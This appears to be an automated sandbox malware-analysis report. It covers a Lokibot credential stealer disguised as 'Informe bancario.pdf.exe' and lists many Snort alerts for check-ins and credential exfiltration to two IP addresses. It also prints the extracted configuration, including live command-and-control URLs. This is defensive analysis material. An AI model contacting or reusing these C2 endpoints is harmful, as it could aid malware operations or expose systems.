              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349774802024313 06/23/22-17:55:10.726793
              SID:2024313
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349776802025381 06/23/22-17:55:13.438859
              SID:2025381
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349774802024318 06/23/22-17:55:10.726793
              SID:2024318
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249831802025381 06/23/22-17:55:33.546351
              SID:2025381
              Source Port:49831
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349836802025381 06/23/22-17:55:40.617404
              SID:2025381
              Source Port:49836
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249742802025381 06/23/22-17:54:35.573404
              SID:2025381
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249769802024313 06/23/22-17:55:00.833023
              SID:2024313
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349780802021641 06/23/22-17:55:16.534873
              SID:2021641
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249852802024313 06/23/22-17:55:55.592533
              SID:2024313
              Source Port:49852
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349881802024313 06/23/22-17:56:16.928509
              SID:2024313
              Source Port:49881
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249769802024318 06/23/22-17:55:00.833023
              SID:2024318
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249757802021641 06/23/22-17:54:50.135454
              SID:2021641
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349792802024313 06/23/22-17:55:18.935502
              SID:2024313
              Source Port:49792
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349765802025381 06/23/22-17:54:54.716737
              SID:2025381
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249882802024318 06/23/22-17:56:19.809048
              SID:2024318
              Source Port:49882
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349813802025381 06/23/22-17:55:22.328153
              SID:2025381
              Source Port:49813
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349813802021641 06/23/22-17:55:22.328153
              SID:2021641
              Source Port:49813
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249772802024318 06/23/22-17:55:07.425069
              SID:2024318
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349774802025381 06/23/22-17:55:10.726793
              SID:2025381
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349776802021641 06/23/22-17:55:13.438859
              SID:2021641
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249873802021641 06/23/22-17:56:04.198158
              SID:2021641
              Source Port:49873
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249816802025381 06/23/22-17:55:26.329557
              SID:2025381
              Source Port:49816
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249882802021641 06/23/22-17:56:19.809048
              SID:2021641
              Source Port:49882
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349865802021641 06/23/22-17:56:00.557524
              SID:2021641
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349883802024318 06/23/22-17:56:20.757705
              SID:2024318
              Source Port:49883
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349883802024313 06/23/22-17:56:20.757705
              SID:2024313
              Source Port:49883
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249844802025381 06/23/22-17:55:50.553165
              SID:2025381
              Source Port:49844
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249747802024313 06/23/22-17:54:44.305987
              SID:2024313
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249749802025381 06/23/22-17:54:47.375834
              SID:2025381
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249845802021641 06/23/22-17:55:53.427872
              SID:2021641
              Source Port:49845
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249746802025381 06/23/22-17:54:42.346945
              SID:2025381
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249741802021641 06/23/22-17:54:33.910153
              SID:2021641
              Source Port:49741
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249744802024318 06/23/22-17:54:38.472164
              SID:2024318
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249859802025381 06/23/22-17:55:58.152468
              SID:2025381
              Source Port:49859
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349835802025381 06/23/22-17:55:36.607918
              SID:2025381
              Source Port:49835
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249744802024313 06/23/22-17:54:38.472164
              SID:2024313
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249747802024318 06/23/22-17:54:44.305987
              SID:2024318
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349803802024313 06/23/22-17:55:20.890777
              SID:2024313
              Source Port:49803
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249852802025381 06/23/22-17:55:55.592533
              SID:2025381
              Source Port:49852
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349766802024318 06/23/22-17:54:56.372364
              SID:2024318
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249831802024313 06/23/22-17:55:33.546351
              SID:2024313
              Source Port:49831
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249771802021641 06/23/22-17:55:04.009923
              SID:2021641
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349803802024318 06/23/22-17:55:20.890777
              SID:2024318
              Source Port:49803
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249831802024318 06/23/22-17:55:33.546351
              SID:2024318
              Source Port:49831
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249757802025381 06/23/22-17:54:50.135454
              SID:2025381
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249742802024317 06/23/22-17:54:35.573404
              SID:2024317
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249742802024312 06/23/22-17:54:35.573404
              SID:2024312
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349766802024313 06/23/22-17:54:56.372364
              SID:2024313
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249768802025381 06/23/22-17:54:59.413778
              SID:2025381
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349872802024313 06/23/22-17:56:02.086134
              SID:2024313
              Source Port:49872
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349843802021641 06/23/22-17:55:45.763232
              SID:2021641
              Source Port:49843
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349765802021641 06/23/22-17:54:54.716737
              SID:2021641
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349837802021641 06/23/22-17:55:42.276335
              SID:2021641
              Source Port:49837
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349872802024318 06/23/22-17:56:02.086134
              SID:2024318
              Source Port:49872
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249772802024313 06/23/22-17:55:07.425069
              SID:2024313
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349780802025381 06/23/22-17:55:16.534873
              SID:2025381
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Informe bancario.pdf.exeVirustotal: Detection: 29%Perma Link
              Source: kossa.xyzVirustotal: Detection: 9%Perma Link
              Source: Informe bancario.pdf.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://kossa.xyz/esi/pp/play.php"]}
              Source: Informe bancario.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Informe bancario.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

              Networking

              barindex
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49741 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49741 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49767 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49768 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49769 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49770 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49771 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49772 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49774 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49775 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49776 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49778 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49780 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49792 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49803 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49803 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49803 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49803 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49813 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49816 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49816 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49816 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49816 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49831 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49831 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49831 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49831 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49835 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49835 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49835 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49835 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49836 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49836 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49836 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49836 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49837 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49837 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49837 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49837 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49843 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49843 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49843 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49843 -> 104.21.40.153:80
